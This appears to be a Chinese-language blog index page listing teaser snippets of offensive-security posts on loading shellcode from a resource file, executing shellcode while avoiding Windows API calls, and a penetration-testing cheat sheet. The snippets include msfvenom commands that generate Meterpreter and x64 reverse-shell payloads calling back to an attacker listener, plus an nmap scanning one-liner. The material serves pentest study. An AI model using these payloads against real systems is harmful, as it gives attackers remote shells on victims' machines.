通过资源文件加载Shellcode

0x01 生成Shellcode

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.86.133 LPORT=12345 >payload.bin

阅读更多 >>

避开Windows API执行Shellcode

Code

#pragma section(".text")

// msvenom -p windows/x64/shell_reverse_tcp lhost=X lport=Y -f c

阅读更多 >>

渗透测试速查表

侦察

存活IP扫描

nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

阅读更多 >>